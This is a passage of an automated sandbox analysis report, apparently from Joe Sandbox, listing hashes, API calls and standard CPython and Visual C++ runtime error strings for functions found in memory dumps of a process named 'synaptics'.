                                                                                                                                                                                                      • API ID: Err_Stringmemcpy
                                                                                                                                                                                                      • String ID: byte string is too long
                                                                                                                                                                                                      • API String ID: 3744242541-1913100739
                                                                                                                                                                                                      • Opcode ID: 3fcbff55f35954878e512f7a7745fc30e5e98098f7d9a99a2fc63846daa85816
                                                                                                                                                                                                      • Instruction ID: c91e00dbb961677330c44d5310f3e647e8a2f6ca2cefb372c484709f8a2cb0db
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fcbff55f35954878e512f7a7745fc30e5e98098f7d9a99a2fc63846daa85816
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71212932B041149BC710DE69EC80CA5B3F9EB8527A74406B6EC68C7B51DB35AC648AE1
                                                                                                                                                                                                      Function 6C569F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 6C569F43
                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6C569F8D
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(?), ref: 6C569FF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FullNamePath$Mem_Wcsdup
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 2221830363-3213955731
                                                                                                                                                                                                      • Opcode ID: b1e9e30d403272e57481cfe6572763d199bd71c45c56724dd9ca445edfd9da7b
                                                                                                                                                                                                      • Instruction ID: 2c4c5ee898e00a7c4a818ce63d20a33dd6acab457c123ca3c3f2446795dac6cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e9e30d403272e57481cfe6572763d199bd71c45c56724dd9ca445edfd9da7b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C521E9317001189BCF11DF69DC44BDEFBF8EF85326F21427AE819CBA90DB3199188A81
                                                                                                                                                                                                      Function 6C49AFA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000), ref: 6C49B000
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(memoryview: a bytes-like object is required, not '%.200s',?), ref: 6C49B070
                                                                                                                                                                                                        • Part of subcall function 6C49AD20: _PyErr_SetString.PYTHON310(00000000,6C73D6C0,memoryview: number of dimensions must not exceed 64,00000000,?,00000000,00000000,?,6C49AEEB), ref: 6C49AD56
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • memoryview: a bytes-like object is required, not '%.200s', xrefs: 6C49B065
                                                                                                                                                                                                      • operation forbidden on released memoryview object, xrefs: 6C49AFE8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObjectString
                                                                                                                                                                                                      • String ID: memoryview: a bytes-like object is required, not '%.200s'$operation forbidden on released memoryview object
                                                                                                                                                                                                      • API String ID: 4217723962-1304663460
                                                                                                                                                                                                      • Opcode ID: c0efc9b058a82e62c0dc22146eb62387a7fa6822013554ad238b3573abbde427
                                                                                                                                                                                                      • Instruction ID: 37f2078e562a6804d5d807298f392e05c44a30e17b376433cef9983390784ea4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0efc9b058a82e62c0dc22146eb62387a7fa6822013554ad238b3573abbde427
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21F876B0022457D610DA6AAC41FA6B7A5DBC123EF2442B9DD1C8BB91DB22DC4682D1
                                                                                                                                                                                                      Function 6C4B8440 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B84B8
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000), ref: 6C4B8509
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • `<tl, xrefs: 6C4B84AE
                                                                                                                                                                                                      • metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases, xrefs: 6C4B84F4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ObjectSubtypeType_
                                                                                                                                                                                                      • String ID: `<tl$metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases
                                                                                                                                                                                                      • API String ID: 4146583695-925834089
                                                                                                                                                                                                      • Opcode ID: 4265f2919d9111bc3f5cf9de7817cedd1eb11b10b43850988e91a12af6cb948d
                                                                                                                                                                                                      • Instruction ID: d3b3369e4973fede00a3ff8e76c5d4a0816fc881ef462f3bc1ce71e3f9926ca1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4265f2919d9111bc3f5cf9de7817cedd1eb11b10b43850988e91a12af6cb948d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21E6767052128FD710CE19DD81F66B3E8EB95729F19417AE818EB790E630EC0587F1
                                                                                                                                                                                                      Function 6C4E9C70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(must be str, not %.100s,?), ref: 6C4E9C99
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: $$must be str, not %.100s
                                                                                                                                                                                                      • API String ID: 4090262012-3524382677
                                                                                                                                                                                                      • Opcode ID: 97ef1692e22ba8f8ef14a4b3b13849100ed7211558140957d62b3982f23412ba
                                                                                                                                                                                                      • Instruction ID: 39c05f42b9677340234ee16dce718a0ab1543e4f358360b9bbc2cd04720f00b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97ef1692e22ba8f8ef14a4b3b13849100ed7211558140957d62b3982f23412ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0319CB5700709AFD720CF59C880FA9BBF4FB5921AF118658ED6887B90C332E954CB90
                                                                                                                                                                                                      Function 6C4E9E20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(must be str, not %.100s,?), ref: 6C4E9E49
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: $$must be str, not %.100s
                                                                                                                                                                                                      • API String ID: 4090262012-3524382677
                                                                                                                                                                                                      • Opcode ID: 5a7b8bb2a6736000de50e641b1ffe5a71388bdb52547c184a3cdea791d45fd5e
                                                                                                                                                                                                      • Instruction ID: 6ff50a16349b3b65b30de597098911d7086431f4a6dc582258d56b7e5e69b0eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7b8bb2a6736000de50e641b1ffe5a71388bdb52547c184a3cdea791d45fd5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90319CB5700709AFDB10CF59C880FA9B7F4FF5921AF118658E95887B90C332E954CB90
                                                                                                                                                                                                      Function 6C44FC50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C0F0,PyBuffer_FillInfo: view==NULL argument is obsolete), ref: 6C44FC7A
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C0F0,Object is not writable.), ref: 6C44FCB5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Object is not writable., xrefs: 6C44FCAE
                                                                                                                                                                                                      • PyBuffer_FillInfo: view==NULL argument is obsolete, xrefs: 6C44FC73
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$Object
                                                                                                                                                                                                      • String ID: Object is not writable.$PyBuffer_FillInfo: view==NULL argument is obsolete
                                                                                                                                                                                                      • API String ID: 2901738166-2897370625
                                                                                                                                                                                                      • Opcode ID: 2b06ddf3fd1c4bce5d93677e525a49bf0718fe61632b3addecb2987132361eb7
                                                                                                                                                                                                      • Instruction ID: be67aa83c1bca6e1d3076749aedf3ab5cfa3d4ef39d8375290b330d14b82e9cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b06ddf3fd1c4bce5d93677e525a49bf0718fe61632b3addecb2987132361eb7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F21A872B417048FDB20CF2ED841A86B7E4EF89365F14862ADC58C7B91E731E8158BD1
                                                                                                                                                                                                      Function 6C44F8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C0F0,00000000,00000000,00000000,00000000), ref: 6C44F9A4
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?), ref: 6C44F9C6
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?,?), ref: 6C44F9D0
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C44FA32
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?,?,?,?), ref: 6C44FA3C
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?,?,?,?,?), ref: 6C44FA46
                                                                                                                                                                                                      • PyMem_Malloc.PYTHON310(?), ref: 6C44FA5F
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310 ref: 6C44FA71
                                                                                                                                                                                                      • PyBuffer_GetPointer.PYTHON310(?,00000000), ref: 6C44FB05
                                                                                                                                                                                                      • PyBuffer_GetPointer.PYTHON310(?,00000000,00000000,?), ref: 6C44FB18
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C44FB21
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?), ref: 6C44FB4D
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?,?), ref: 6C44FB57
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(a bytes-like object is required, not '%.100s',?), ref: 6C44FB76
                                                                                                                                                                                                      • PyBuffer_Release.PYTHON310(?), ref: 6C44FB83
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000,?,?,?), ref: 6C44FBBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • both destination and source must be bytes-like objects, xrefs: 6C44FBA6
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C44F8DB
                                                                                                                                                                                                      • a bytes-like object is required, not '%.100s', xrefs: 6C44FB6B
                                                                                                                                                                                                      • @xJlr, xrefs: 6C44F8A2, 6C44FB42
                                                                                                                                                                                                      • destination is too small to receive data from source, xrefs: 6C44F992
                                                                                                                                                                                                      • F, xrefs: 6C44F83D
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C44F8E0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Buffer_$Release$Err_$ObjectPointermemcpy$FormatMallocMem_Memory
                                                                                                                                                                                                      • String ID: @xJlr$F$Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory$a bytes-like object is required, not '%.100s'$both destination and source must be bytes-like objects$destination is too small to receive data from source
                                                                                                                                                                                                      • API String ID: 288215153-2501333497
                                                                                                                                                                                                      • Opcode ID: a43a5520e76a10a6765dd7226823346b26d2de0610d9c0f62c696b32a8bfcff8
                                                                                                                                                                                                      • Instruction ID: 0fb463f84a1f58ad370f45103676cbaf669ed5bdb0b3c0da44d7b63a9a2f83d3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a43a5520e76a10a6765dd7226823346b26d2de0610d9c0f62c696b32a8bfcff8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F321A3716022059FF604CE55CC85DAB77ECEF42229F248568ED64CBB91E735EC05CBA1
                                                                                                                                                                                                      Function 73A86BB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _FindAndUnlinkFrame.VCRUNTIME140(?), ref: 73A86BC4
                                                                                                                                                                                                      • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?), ref: 73A86C2E
                                                                                                                                                                                                      • __DestructExceptionObject.VCRUNTIME140(?,00000001), ref: 73A86C42
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 1567117672-1018135373
                                                                                                                                                                                                      • Opcode ID: a4d2044332fa86a1fdc7aaa6079d4e5ee8a0e0a68d537eb28f11ffcbc0f90961
                                                                                                                                                                                                      • Instruction ID: 3fc6ee7c72d9bc89be99e7634dd509a6710b91f0e8d6990bb2d53db42e1ef9c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4d2044332fa86a1fdc7aaa6079d4e5ee8a0e0a68d537eb28f11ffcbc0f90961
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 913116759003108FE70B9F65D246B85B76AFF0522134A049AE51A4F3FAC772D980CBE1
                                                                                                                                                                                                      Function 6C466C80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • cannot convert '%.200s' object to bytes, xrefs: 6C466D64
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
